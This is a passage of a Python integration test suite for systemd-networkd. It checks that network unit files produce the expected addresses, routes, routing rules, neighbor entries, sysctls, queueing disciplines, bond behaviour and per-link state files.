self.assertNotRegex(output, '10.10.0.1/16')
self.assertNotRegex(output, '10.10.0.2/16')
output = check_output('ip -4 address show dev dummy98 label 32')
self.assertRegex(output, 'inet 10.3.2.3/16 brd 10.3.255.255 scope global 32')
output = check_output('ip -4 address show dev dummy98 label 33')
self.assertRegex(output, 'inet 10.4.2.3 peer 10.4.2.4/16 scope global 33')
output = check_output('ip -4 address show dev dummy98 label 34')
self.assertRegex(output, 'inet 192.168.[0-9]*.1/24 brd 192.168.[0-9]*.255 scope global 34')
output = check_output('ip -4 address show dev dummy98 label 35')
self.assertRegex(output, 'inet 172.[0-9]*.0.1/16 brd 172.[0-9]*.255.255 scope global 35')
output = check_output('ip -6 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet6 2001:db8:0:f101::15/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f101::16/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f102::15/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f102::16/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f103::20 peer 2001:db8:0:f103::10/128 scope global')
self.assertRegex(output, 'inet6 fd[0-9a-f:]*1/64 scope global')
    def test_address_preferred_lifetime_zero_ipv6(self):
        """PreferredLifetime=0 must make the IPv4 address deprecated with link
        scope, while the IPv6 address and static default route stay in place."""
        copy_unit_to_networkd_unit_path('25-address-preferred-lifetime-zero.network', '12-dummy.netdev')
        start_networkd(5)

        self.wait_online(['dummy98:routable'])

        output = check_output('ip address show dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope link deprecated dummy98')
        self.assertRegex(output, 'inet6 2001:db8:0:f101::1/64 scope global')

        output = check_output('ip route show dev dummy98')
        print(output)
        self.assertRegex(output, 'default via 20.20.20.1 proto static')
def test_address_dad(self):
copy_unit_to_networkd_unit_path('25-address-dad-veth99.network', '25-address-dad-veth-peer.network',
'25-veth.netdev')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:degraded'])
output = check_output('ip -4 address show dev veth99')
print(output)
self.assertRegex(output, '192.168.100.10/24')
output = check_output('ip -4 address show dev veth-peer')
print(output)
self.assertNotRegex(output, '192.168.100.10/24')
def test_configure_without_carrier(self):
copy_unit_to_networkd_unit_path('configure-without-carrier.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:routable'])
output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
print(output)
self.assertRegex(output, '192.168.0.15')
self.assertRegex(output, '192.168.0.1')
self.assertRegex(output, 'routable')
def test_routing_policy_rule(self):
copy_unit_to_networkd_unit_path('routing-policy-rule-test1.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule list iif test1 priority 111')
print(output)
self.assertRegex(output, '111:')
self.assertRegex(output, 'from 192.168.100.18')
self.assertRegex(output, r'tos (0x08|throughput)\s')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'oif test1')
self.assertRegex(output, 'lookup 7')
output = check_output('ip rule list iif test1 priority 101')
print(output)
self.assertRegex(output, '101:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 9')
output = check_output('ip -6 rule list iif test1 priority 100')
print(output)
self.assertRegex(output, '100:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 8')
output = check_output('ip -6 rule list iif test1 priority 101')
print(output)
self.assertRegex(output, '101:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 9')
    def test_routing_policy_rule_issue_11280(self):
        """Regression test for issue #11280: routing policy rules must survive
        repeated networkd restarts (with state files kept) without being
        dropped or duplicated."""
        copy_unit_to_networkd_unit_path('routing-policy-rule-test1.network', '11-dummy.netdev',
                                        'routing-policy-rule-dummy98.network', '12-dummy.netdev')

        for trial in range(3):
            # Remove state files only first time
            start_networkd(3)
            self.wait_online(['test1:degraded', 'dummy98:degraded'])
            time.sleep(1)

            output = check_output('ip rule list table 7')
            print(output)
            self.assertRegex(output, '111: from 192.168.100.18 tos (0x08|throughput) iif test1 oif test1 lookup 7')

            output = check_output('ip rule list table 8')
            print(output)
            self.assertRegex(output, '112: from 192.168.101.18 tos (0x08|throughput) iif dummy98 oif dummy98 lookup 8')

            stop_networkd(remove_state_files=False)
@expectedFailureIfRoutingPolicyPortRangeIsNotAvailable()
def test_routing_policy_rule_port_range(self):
copy_unit_to_networkd_unit_path('25-fibrule-port-range.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule')
print(output)
self.assertRegex(output, '111')
self.assertRegex(output, 'from 192.168.100.18')
self.assertRegex(output, '1123-1150')
self.assertRegex(output, '3224-3290')
self.assertRegex(output, 'tcp')
self.assertRegex(output, 'lookup 7')
@expectedFailureIfRoutingPolicyIPProtoIsNotAvailable()
def test_routing_policy_rule_invert(self):
copy_unit_to_networkd_unit_path('25-fibrule-invert.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule')
print(output)
self.assertRegex(output, '111')
self.assertRegex(output, 'not.*?from.*?192.168.100.18')
self.assertRegex(output, 'tcp')
self.assertRegex(output, 'lookup 7')
    def test_route_static(self):
        """Exercise a broad mix of static [Route] options: IPv4/IPv6 routes,
        default/onlink gateways, scopes, metrics, window options, multicast,
        local/anycast/broadcast table entries, blackhole/unreachable/prohibit
        types and multipath (nexthop) routes."""
        copy_unit_to_networkd_unit_path('25-route-static.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:routable'])

        output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
        print(output)

        print('### ip -6 route show dev dummy98')
        output = check_output('ip -6 route show dev dummy98')
        print(output)
        self.assertRegex(output, '2001:1234:5:8fff:ff:ff:ff:ff proto static')
        self.assertRegex(output, '2001:1234:5:8f63::1 proto kernel')

        print('### ip -6 route show dev dummy98 default')
        output = check_output('ip -6 route show dev dummy98 default')
        print(output)
        self.assertRegex(output, 'default via 2001:1234:5:8fff:ff:ff:ff:ff proto static metric 1024 pref medium')

        print('### ip -4 route show dev dummy98')
        output = check_output('ip -4 route show dev dummy98')
        print(output)
        self.assertRegex(output, '149.10.124.48/28 proto kernel scope link src 149.10.124.58')
        self.assertRegex(output, '149.10.124.64 proto static scope link')
        self.assertRegex(output, '169.254.0.0/16 proto static scope link metric 2048')
        self.assertRegex(output, '192.168.1.1 proto static initcwnd 20')
        self.assertRegex(output, '192.168.1.2 proto static initrwnd 30')
        self.assertRegex(output, 'multicast 149.10.123.4 proto static')

        print('### ip -4 route show dev dummy98 default')
        output = check_output('ip -4 route show dev dummy98 default')
        print(output)
        self.assertRegex(output, 'default via 149.10.125.65 proto static onlink')
        self.assertRegex(output, 'default via 149.10.124.64 proto static')
        self.assertRegex(output, 'default proto static')

        print('### ip -4 route show table local dev dummy98')
        output = check_output('ip -4 route show table local dev dummy98')
        print(output)
        self.assertRegex(output, 'local 149.10.123.1 proto static scope host')
        self.assertRegex(output, 'anycast 149.10.123.2 proto static scope link')
        self.assertRegex(output, 'broadcast 149.10.123.3 proto static scope link')

        print('### ip route show type blackhole')
        output = check_output('ip route show type blackhole')
        print(output)
        self.assertRegex(output, 'blackhole 202.54.1.2 proto static')

        print('### ip route show type unreachable')
        output = check_output('ip route show type unreachable')
        print(output)
        self.assertRegex(output, 'unreachable 202.54.1.3 proto static')

        print('### ip route show type prohibit')
        output = check_output('ip route show type prohibit')
        print(output)
        self.assertRegex(output, 'prohibit 202.54.1.4 proto static')

        print('### ip route show 192.168.10.1')
        output = check_output('ip route show 192.168.10.1')
        print(output)
        self.assertRegex(output, '192.168.10.1 proto static')
        self.assertRegex(output, 'nexthop via 149.10.124.59 dev dummy98 weight 10')
        self.assertRegex(output, 'nexthop via 149.10.124.60 dev dummy98 weight 5')

        print('### ip route show 192.168.10.2')
        output = check_output('ip route show 192.168.10.2')
        print(output)
        # old ip command does not show IPv6 gateways...
        self.assertRegex(output, '192.168.10.2 proto static')
        self.assertRegex(output, 'nexthop')
        self.assertRegex(output, 'dev dummy98 weight 10')
        self.assertRegex(output, 'dev dummy98 weight 5')

        print('### ip -6 route show 2001:1234:5:7fff:ff:ff:ff:ff')
        output = check_output('ip -6 route show 2001:1234:5:7fff:ff:ff:ff:ff')
        print(output)
        # old ip command does not show 'nexthop' keyword and weight...
        self.assertRegex(output, '2001:1234:5:7fff:ff:ff:ff:ff')
        self.assertRegex(output, 'via 2001:1234:5:8fff:ff:ff:ff:ff dev dummy98')
        self.assertRegex(output, 'via 2001:1234:5:9fff:ff:ff:ff:ff dev dummy98')
    def test_gateway_reconfigure(self):
        """Swapping the .network file for one with a different Gateway= and
        restarting networkd must replace the old default route, not keep both."""
        copy_unit_to_networkd_unit_path('25-gateway-static.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:routable'])
        print('### ip -4 route show dev dummy98 default')
        output = check_output('ip -4 route show dev dummy98 default')
        print(output)
        self.assertRegex(output, 'default via 149.10.124.59 proto static')
        self.assertNotRegex(output, '149.10.124.60')

        remove_unit_from_networkd_path(['25-gateway-static.network'])
        copy_unit_to_networkd_unit_path('25-gateway-next-static.network')
        restart_networkd(3)
        self.wait_online(['dummy98:routable'])
        print('### ip -4 route show dev dummy98 default')
        output = check_output('ip -4 route show dev dummy98 default')
        print(output)
        self.assertNotRegex(output, '149.10.124.59')
        self.assertRegex(output, 'default via 149.10.124.60 proto static')
    def test_ip_route_ipv6_src_route(self):
        """An IPv6 route with PreferredSource= must be installed once the
        source address leaves the tentative state."""
        # a dummy device does not make the addresses go through tentative state, so we
        # reuse a bond from an earlier test, which does make the addresses go through
        # tentative state, and do our test on that
        copy_unit_to_networkd_unit_path('23-active-slave.network', '25-route-ipv6-src.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:enslaved', 'bond199:routable'])

        output = check_output('ip -6 route list dev bond199')
        print(output)
        self.assertRegex(output, 'abcd::/16')
        self.assertRegex(output, 'src')
        self.assertRegex(output, '2001:1234:56:8f63::2')
def test_ip_link_mac_address(self):
copy_unit_to_networkd_unit_path('25-address-link-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output('ip link show dummy98')
print(output)
self.assertRegex(output, '00:01:02:aa:bb:cc')
    def test_ip_link_unmanaged(self):
        """Unmanaged=yes must leave the link alone: it exists but its setup
        state stays 'unmanaged' and operstate stays 'off'."""
        copy_unit_to_networkd_unit_path('25-link-section-unmanaged.network', '12-dummy.netdev')
        start_networkd(5)

        self.check_link_exists('dummy98')

        self.check_operstate('dummy98', 'off', setup_state='unmanaged')
def test_ipv6_address_label(self):
copy_unit_to_networkd_unit_path('25-ipv6-address-label-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output('ip addrlabel list')
print(output)
self.assertRegex(output, '2004:da8:1::/64')
    def test_neighbor_section(self):
        """[Neighbor] sections must create PERMANENT IPv4 and IPv6 neighbor
        entries on the device."""
        copy_unit_to_networkd_unit_path('25-neighbor-section.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:degraded'], timeout='40s')

        print('### ip neigh list dev dummy98')
        output = check_output('ip neigh list dev dummy98')
        print(output)
        self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
        self.assertRegex(output, '2004:da8:1::1.*00:00:5e:00:02:66.*PERMANENT')
    def test_neighbor_reconfigure(self):
        """Replacing the .network file with different [Neighbor] sections and
        restarting networkd must drop the old entries and add the new ones."""
        copy_unit_to_networkd_unit_path('25-neighbor-section.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:degraded'], timeout='40s')

        print('### ip neigh list dev dummy98')
        output = check_output('ip neigh list dev dummy98')
        print(output)
        self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
        self.assertRegex(output, '2004:da8:1::1.*00:00:5e:00:02:66.*PERMANENT')

        remove_unit_from_networkd_path(['25-neighbor-section.network'])
        copy_unit_to_networkd_unit_path('25-neighbor-next.network')
        restart_networkd(3)
        self.wait_online(['dummy98:degraded'], timeout='40s')
        print('### ip neigh list dev dummy98')
        output = check_output('ip neigh list dev dummy98')
        print(output)
        self.assertNotRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
        self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:66.*PERMANENT')
        self.assertNotRegex(output, '2004:da8:1::1.*PERMANENT')
    def test_neighbor_gre(self):
        """[Neighbor] sections must also work on gre and ip6gre tunnel
        devices, where the lladdr is an IP address rather than a MAC."""
        copy_unit_to_networkd_unit_path('25-neighbor-ip.network', '25-neighbor-ipv6.network', '25-neighbor-ip-dummy.network',
                                        '12-dummy.netdev', '25-gre-tunnel-remote-any.netdev', '25-ip6gre-tunnel-remote-any.netdev')
        start_networkd()
        self.wait_online(['dummy98:degraded', 'gretun97:routable', 'ip6gretun97:routable'], timeout='40s')

        output = check_output('ip neigh list dev gretun97')
        print(output)
        self.assertRegex(output, '10.0.0.22 lladdr 10.65.223.239 PERMANENT')

        output = check_output('ip neigh list dev ip6gretun97')
        print(output)
        self.assertRegex(output, '2001:db8:0:f102::17 lladdr 2a:?00:ff:?de:45:?67:ed:?de:[0:]*:49:?88 PERMANENT')
def test_link_local_addressing(self):
copy_unit_to_networkd_unit_path('25-link-local-addressing-yes.network', '11-dummy.netdev',
'25-link-local-addressing-no.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded', 'dummy98:carrier'])
output = check_output('ip address show dev test1')
print(output)
self.assertRegex(output, 'inet .* scope link')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip address show dev dummy98')
print(output)
self.assertNotRegex(output, 'inet6* .* scope link')
'''
Documentation/networking/ip-sysctl.txt
addr_gen_mode - INTEGER
Defines how link-local and autoconf addresses are generated.
0: generate address based on EUI64 (default)
1: do no generate a link-local address, use EUI64 for addresses generated
from autoconf
2: generate stable privacy addresses, using the secret from
stable_secret (RFC7217)
3: generate stable privacy addresses, using a random secret if unset
'''
test1_addr_gen_mode = ''
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'stable_secret')):
with open(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'stable_secret')) as f:
try:
f.readline()
except IOError:
# if stable_secret is unset, then EIO is returned
test1_addr_gen_mode = '0'
else:
test1_addr_gen_mode = '2'
else:
test1_addr_gen_mode = '0'
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'addr_gen_mode')):
self.assertEqual(read_ipv6_sysctl_attr('test1', 'addr_gen_mode'), test1_addr_gen_mode)
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'dummy98'), 'addr_gen_mode')):
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'addr_gen_mode'), '1')
    def test_link_local_addressing_remove_ipv6ll(self):
        """Switching to LinkLocalAddressing=no and restarting networkd must
        remove the previously assigned IPv6 link-local address."""
        copy_unit_to_networkd_unit_path('26-link-local-addressing-ipv6.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:degraded'])

        output = check_output('ip address show dev dummy98')
        print(output)
        self.assertRegex(output, 'inet6 .* scope link')

        copy_unit_to_networkd_unit_path('25-link-local-addressing-no.network')
        restart_networkd(1)
        self.wait_online(['dummy98:carrier'])

        output = check_output('ip address show dev dummy98')
        print(output)
        self.assertNotRegex(output, 'inet6* .* scope link')
def test_sysctl(self):
copy_unit_to_networkd_unit_path('25-sysctl.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'forwarding'), '1')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'use_tempaddr'), '2')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'dad_transmits'), '3')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'hop_limit'), '5')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'proxy_ndp'), '1')
self.assertEqual(read_ipv4_sysctl_attr('dummy98', 'forwarding'),'1')
self.assertEqual(read_ipv4_sysctl_attr('dummy98', 'proxy_arp'), '1')
    def test_sysctl_disable_ipv6(self):
        """networkd must configure the same addresses and routes regardless of
        whether the kernel's global disable_ipv6 sysctl was on or off when it
        started (it re-enables IPv6 per-link as needed)."""
        copy_unit_to_networkd_unit_path('25-sysctl-disable-ipv6.network', '12-dummy.netdev')

        print('## Disable ipv6')
        check_output('sysctl net.ipv6.conf.all.disable_ipv6=1')
        check_output('sysctl net.ipv6.conf.default.disable_ipv6=1')

        start_networkd()
        self.wait_online(['dummy98:routable'])

        output = check_output('ip -4 address show dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope global dummy98')
        output = check_output('ip -6 address show dummy98')
        print(output)
        self.assertRegex(output, 'inet6 2607:5300:203:3906::/64 scope global')
        self.assertRegex(output, 'inet6 .* scope link')
        output = check_output('ip -4 route show dev dummy98')
        print(output)
        self.assertEqual(output, '10.2.0.0/16 proto kernel scope link src 10.2.3.4')
        output = check_output('ip -6 route show dev dummy98')
        print(output)
        self.assertRegex(output, 'default via 2607:5300:203:39ff:ff:ff:ff:ff proto static')

        check_output('ip link del dummy98')

        print('## Enable ipv6')
        check_output('sysctl net.ipv6.conf.all.disable_ipv6=0')
        check_output('sysctl net.ipv6.conf.default.disable_ipv6=0')

        restart_networkd(3)
        self.wait_online(['dummy98:routable'])

        # same checks as above: results must be identical with IPv6 enabled
        output = check_output('ip -4 address show dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope global dummy98')
        output = check_output('ip -6 address show dummy98')
        print(output)
        self.assertRegex(output, 'inet6 2607:5300:203:3906::/64 scope global')
        self.assertRegex(output, 'inet6 .* scope link')
        output = check_output('ip -4 route show dev dummy98')
        print(output)
        self.assertEqual(output, '10.2.0.0/16 proto kernel scope link src 10.2.3.4')
        output = check_output('ip -6 route show dev dummy98')
        print(output)
        self.assertRegex(output, 'default via 2607:5300:203:39ff:ff:ff:ff:ff proto static')
    def test_bind_carrier(self):
        """BindCarrier= must keep test1 up while at least one of the bound
        links (dummy98/dummy99) has carrier, and take it down when none do."""
        check_output('ip link add dummy98 type dummy')
        check_output('ip link set dummy98 up')
        time.sleep(2)

        copy_unit_to_networkd_unit_path('25-bind-carrier.network', '11-dummy.netdev')
        start_networkd()
        self.wait_online(['test1:routable'])

        output = check_output('ip address show test1')
        print(output)
        self.assertRegex(output, 'UP,LOWER_UP')
        self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
        self.check_operstate('test1', 'routable')

        # add a second carrier link; test1 stays up
        check_output('ip link add dummy99 type dummy')
        check_output('ip link set dummy99 up')
        time.sleep(2)
        output = check_output('ip address show test1')
        print(output)
        self.assertRegex(output, 'UP,LOWER_UP')
        self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
        self.check_operstate('test1', 'routable')

        # one carrier link remains (dummy99); test1 stays up
        check_output('ip link del dummy98')
        time.sleep(2)
        output = check_output('ip address show test1')
        print(output)
        self.assertRegex(output, 'UP,LOWER_UP')
        self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
        self.check_operstate('test1', 'routable')

        # no carrier link left; test1 must go down and lose its address
        check_output('ip link set dummy99 down')
        time.sleep(2)
        output = check_output('ip address show test1')
        print(output)
        self.assertNotRegex(output, 'UP,LOWER_UP')
        self.assertRegex(output, 'DOWN')
        self.assertNotRegex(output, '192.168.10')
        self.check_operstate('test1', 'off')

        # carrier returns; test1 must come back up
        check_output('ip link set dummy99 up')
        time.sleep(2)
        output = check_output('ip address show test1')
        print(output)
        self.assertRegex(output, 'UP,LOWER_UP')
        self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
        self.check_operstate('test1', 'routable')
def test_domain(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '24-search-domain.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
print(output)
self.assertRegex(output, 'Address: 192.168.42.100')
self.assertRegex(output, 'DNS: 192.168.42.1')
self.assertRegex(output, 'Search Domains: one')
    def test_keep_configuration_static(self):
        """KeepConfiguration=static must preserve a foreign static address but
        drop a foreign dynamic one (the address with finite lifetimes)."""
        check_output('systemctl stop systemd-networkd')

        # configure addresses behind networkd's back
        check_output('ip link add name dummy98 type dummy')
        check_output('ip address add 10.1.2.3/16 dev dummy98')
        check_output('ip address add 10.2.3.4/16 dev dummy98 valid_lft 600 preferred_lft 500')
        output = check_output('ip address show dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.1.2.3/16 scope global dummy98')
        self.assertRegex(output, 'inet 10.2.3.4/16 scope global dynamic dummy98')
        output = check_output('ip route show dev dummy98')
        print(output)

        copy_unit_to_networkd_unit_path('24-keep-configuration-static.network')
        start_networkd()
        self.wait_online(['dummy98:routable'])

        output = check_output('ip address show dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.1.2.3/16 scope global dummy98')
        self.assertNotRegex(output, 'inet 10.2.3.4/16 scope global dynamic dummy98')
    @expectedFailureIfNexthopIsNotAvailable()
    def test_nexthop(self):
        """A [NextHop] section must create a nexthop object on the link
        (kernel support permitting)."""
        copy_unit_to_networkd_unit_path('25-nexthop.network', '25-veth.netdev', '25-veth-peer.network')
        start_networkd()
        self.wait_online(['veth99:routable', 'veth-peer:routable'])

        output = check_output('ip nexthop list dev veth99')
        print(output)
        self.assertRegex(output, '192.168.5.1')
    def test_qdisc(self):
        """Traffic-control settings: netem+fq_codel on dummy98 and tbf+sfq on
        test1 must be configured with the parameters from the .network files."""
        copy_unit_to_networkd_unit_path('25-qdisc-netem-and-fqcodel.network', '12-dummy.netdev',
                                        '25-qdisc-tbf-and-sfq.network', '11-dummy.netdev')
        start_networkd()

        self.wait_online(['dummy98:routable', 'test1:routable'])

        output = check_output('tc qdisc show dev dummy98')
        print(output)
        self.assertRegex(output, 'qdisc netem')
        self.assertRegex(output, 'limit 100 delay 50.0ms 10.0ms loss 20%')
        self.assertRegex(output, 'qdisc fq_codel')
        self.assertRegex(output, 'limit 20480p flows 2048 quantum 1400 target 10.0ms ce_threshold 100.0ms interval 200.0ms memory_limit 64Mb ecn')
        output = check_output('tc qdisc show dev test1')
        print(output)
        self.assertRegex(output, 'qdisc tbf')
        self.assertRegex(output, 'rate 1Gbit burst 5000b peakrate 100Gbit minburst 987500b lat 70.0ms')
        self.assertRegex(output, 'qdisc sfq')
        self.assertRegex(output, 'perturb 5sec')
    def test_qdisc2(self):
        """fq and codel qdisc parameters from 25-qdisc-fq-codel.network must
        be applied to dummy98."""
        copy_unit_to_networkd_unit_path('25-qdisc-fq-codel.network', '12-dummy.netdev')
        start_networkd()

        self.wait_online(['dummy98:routable'])

        output = check_output('tc qdisc show dev dummy98')
        print(output)
        self.assertRegex(output, 'qdisc fq')
        self.assertRegex(output, 'limit 1000p flow_limit 200p buckets 512 orphan_mask 511 quantum 1500 initial_quantum 13000 maxrate 1Mbit')
        self.assertRegex(output, 'qdisc codel')
        self.assertRegex(output, 'limit 2000p target 10.0ms ce_threshold 100.0ms interval 50.0ms ecn')
class NetworkdStateFileTests(unittest.TestCase, Utilities):
    """Tests for the per-link state files networkd writes under
    /run/systemd/netif/links/."""

    # links removed in setUp/tearDown
    links = [
        'dummy98',
    ]

    # unit files removed from the networkd unit path in tearDown
    units = [
        '12-dummy.netdev',
        'state-file-tests.network',
    ]

    def setUp(self):
        """Remove leftover links and stop networkd before each test."""
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        """Remove links and installed units, then stop networkd with logs."""
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_state_file(self):
        """Verify the initial state file contents, then that resolvectl/
        timedatectl overrides and their reverts are reflected in the file."""
        copy_unit_to_networkd_unit_path('12-dummy.netdev', 'state-file-tests.network')
        start_networkd()

        self.wait_online(['dummy98:routable'])

        output = check_output(*networkctl_cmd, '--no-legend', 'list', 'dummy98', env=env)
        print(output)
        ifindex = output.split()[0]

        # state file is named after the ifindex
        path = os.path.join('/run/systemd/netif/links/', ifindex)
        self.assertTrue(os.path.exists(path))

        # give networkd a moment to (re)write the state file
        time.sleep(2)

        with open(path) as f:
            data = f.read()
            self.assertRegex(data, r'ADMIN_STATE=configured')
            self.assertRegex(data, r'OPER_STATE=routable')
            self.assertRegex(data, r'REQUIRED_FOR_ONLINE=yes')
            self.assertRegex(data, r'REQUIRED_OPER_STATE_FOR_ONLINE=routable')
            self.assertRegex(data, r'NETWORK_FILE=/run/systemd/network/state-file-tests.network')
            self.assertRegex(data, r'DNS=10.10.10.10 10.10.10.11')
            self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
            self.assertRegex(data, r'DOMAINS=hogehoge')
            self.assertRegex(data, r'ROUTE_DOMAINS=foofoo')
            self.assertRegex(data, r'LLMNR=no')
            self.assertRegex(data, r'MDNS=yes')
            self.assertRegex(data, r'DNSSEC=no')
            self.assertRegex(data, r'ADDRESSES=192.168.(10.10|12.12)/24 192.168.(12.12|10.10)/24')

        # override resolved and timesyncd settings at runtime
        check_output(*resolvectl_cmd, 'dns', 'dummy98', '10.10.10.12', '10.10.10.13', env=env)
        check_output(*resolvectl_cmd, 'domain', 'dummy98', 'hogehogehoge', '~foofoofoo', env=env)
        check_output(*resolvectl_cmd, 'llmnr', 'dummy98', 'yes', env=env)
        check_output(*resolvectl_cmd, 'mdns', 'dummy98', 'no', env=env)
        check_output(*resolvectl_cmd, 'dnssec', 'dummy98', 'yes', env=env)
        check_output(*timedatectl_cmd, 'ntp-servers', 'dummy98', '2.fedora.pool.ntp.org', '3.fedora.pool.ntp.org', env=env)
        time.sleep(2)

        with open(path) as f:
            data = f.read()
            self.assertRegex(data, r'DNS=10.10.10.12 10.10.10.13')
            self.assertRegex(data, r'NTP=2.fedora.pool.ntp.org 3.fedora.pool.ntp.org')
            self.assertRegex(data, r'DOMAINS=hogehogehoge')
            self.assertRegex(data, r'ROUTE_DOMAINS=foofoofoo')
            self.assertRegex(data, r'LLMNR=yes')
            self.assertRegex(data, r'MDNS=no')
            self.assertRegex(data, r'DNSSEC=yes')

        # reverting NTP servers must restore them while DNS overrides remain
        check_output(*timedatectl_cmd, 'revert', 'dummy98', env=env)
        time.sleep(2)

        with open(path) as f:
            data = f.read()
            self.assertRegex(data, r'DNS=10.10.10.12 10.10.10.13')
            self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
            self.assertRegex(data, r'DOMAINS=hogehogehoge')
            self.assertRegex(data, r'ROUTE_DOMAINS=foofoofoo')
            self.assertRegex(data, r'LLMNR=yes')
            self.assertRegex(data, r'MDNS=no')
            self.assertRegex(data, r'DNSSEC=yes')

        # reverting resolved settings must restore the .network file values
        check_output(*resolvectl_cmd, 'revert', 'dummy98', env=env)
        time.sleep(2)

        with open(path) as f:
            data = f.read()
            self.assertRegex(data, r'DNS=10.10.10.10 10.10.10.11')
            self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
            self.assertRegex(data, r'DOMAINS=hogehoge')
            self.assertRegex(data, r'ROUTE_DOMAINS=foofoo')
            self.assertRegex(data, r'LLMNR=no')
            self.assertRegex(data, r'MDNS=yes')
            self.assertRegex(data, r'DNSSEC=no')
class NetworkdBondTests(unittest.TestCase, Utilities):
    """Tests for bond netdevs: slave selection and operational-state
    propagation between the bond and its slaves."""

    # links removed in setUp/tearDown
    links = [
        'bond199',
        'bond99',
        'dummy98',
        'test1']

    # unit files removed from the networkd unit path in tearDown
    units = [
        '11-dummy.netdev',
        '12-dummy.netdev',
        '23-active-slave.network',
        '23-bond199.network',
        '23-primary-slave.network',
        '25-bond-active-backup-slave.netdev',
        '25-bond.netdev',
        'bond99.network',
        'bond-slave.network']

    def setUp(self):
        """Remove leftover links and stop networkd before each test."""
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        """Remove links and installed units, then stop networkd with logs."""
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_bond_active_slave(self):
        """ActiveSlave=yes must select dummy98 as the bond's active slave."""
        copy_unit_to_networkd_unit_path('23-active-slave.network', '23-bond199.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:enslaved', 'bond199:degraded'])

        output = check_output('ip -d link show bond199')
        print(output)
        self.assertRegex(output, 'active_slave dummy98')

    def test_bond_primary_slave(self):
        """PrimarySlave=yes must select dummy98 as the bond's primary slave."""
        copy_unit_to_networkd_unit_path('23-primary-slave.network', '23-bond199.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:enslaved', 'bond199:degraded'])

        output = check_output('ip -d link show bond199')
        print(output)
        self.assertRegex(output, 'primary dummy98')

    def test_bond_operstate(self):
        """The bond's operstate must track its slaves: routable while any
        slave is up, degraded-carrier with one slave down, and no-carrier
        (per the kernel) when all slaves are down."""
        copy_unit_to_networkd_unit_path('25-bond.netdev', '11-dummy.netdev', '12-dummy.netdev',
                                        'bond99.network','bond-slave.network')
        start_networkd()
        self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bond99:routable'])

